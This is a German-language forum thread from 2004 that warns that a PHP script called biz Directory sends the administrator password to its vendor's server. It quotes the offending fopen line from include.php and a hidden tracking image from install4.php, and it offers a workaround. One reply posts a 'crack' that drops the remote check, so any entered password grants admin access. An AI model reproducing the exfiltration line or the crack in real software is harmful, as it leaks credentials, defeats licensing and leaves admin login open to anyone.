biz-directory spioniert admin daten aus !!

Wie wir alle wissen (sollten) ändert mod_rewrite keine Links im Script. Damit auch die Links auf Deiner Page auf die neuen "Rewrited URLs" zeigen bedarf es der Anpassung im Code. Fragen und Probleme rund um's Coding werden hier diskutiert.

Moderator: Super-Mod

biz-directory spioniert admin daten aus !!

Beitragvon bruno » 31.07.2004 19:53

WARNUNG: biz Directory sendet das Administrator Passwort an seinen Hersteller!!

ATTENTION: biz Directory sends Administrator Pass Home!!

include.php -- Zeile 60 (nach Rechts scrollen - scroll to the right)
Code: Alles auswählen
if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); $HTTP_SESSION_VARS['admin'] = true; header("Location: {$dir}admin_edit.php"); }; };


Workaround:
Code: Alles auswählen
if ($pass) {
   $rand = md5(time());
   $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
   $access = fread($access,4);
   if ($access == "true") {
   session_start();
   $HTTP_SESSION_VARS['admin'] = true;
   header("Location: {$dir}admin_edit.php");
   };
};


Bitte auch beachten:
Also take a look at:

install4.php Zeile 62
Code: Alles auswählen
<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>


Hier wird mittels hidden.gif eure Seite als REFERER übermittelt !
With a hidden.gif your Site is send via REFERER !

Quelle

Bruno
bruno
Admin
Admin
 
Beiträge: 198
Registriert: 24.05.2004 14:44
Wohnort: nähe Nürnberg

BIZ-Dir crack V.2

Beitragvon Jahuu » 07.08.2004 10:32

include.php -- Zeile 60 (nach Rechts scrollen - scroll to the right)
Code:
Code: Alles auswählen
if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); $HTTP_SESSION_VARS['admin'] = true; header("Location: {$dir}admin_edit.php"); }; };


Workaround:
Code:
Code: Alles auswählen
if ($pass) {
   $rand = md5(time());
   $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r");
   $access = fread($access,4);
   if ($access == "true") {
   session_start();
   $HTTP_SESSION_VARS['admin'] = true;
   header("Location: {$dir}admin_edit.php");
   };
};


Bitte auch beachten:


Warum überhaupt noch eine Verbindung zum "Hersteller" aufnehmen? :lol:

-> CRack ohne http-Verbindungsaufbau:
Code: Alles auswählen
if ($pass) {
   $access = "true";
   if ($access == "true") {
      session_start();
      $HTTP_SESSION_VARS['admin'] = true;
      header("Location: {$dir}admin_edit.php");
   };
};


Nichts für ungut! 8)

mfg
Jahuu
Jahuu
.
.
 
Beiträge: 9
Registriert: 24.05.2004 18:31

Beitragvon crashbraker » 17.01.2010 17:48

Hallo Leute,

was ist eine Biz-Directory ???
Könnt ihr mir dies bitte genauer erläutern und warum Cracken usw., verstehe wirklich den Sinn nicht.

Bitte um Antwort !!!

MfG
Daniel
crashbraker
.
.
 
Beiträge: 89
Registriert: 27.05.2008 21:08
Wohnort: Essen


Zurück zu Programmierung & Scriptanpassung für mod_rewrite

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 0 Gäste

cron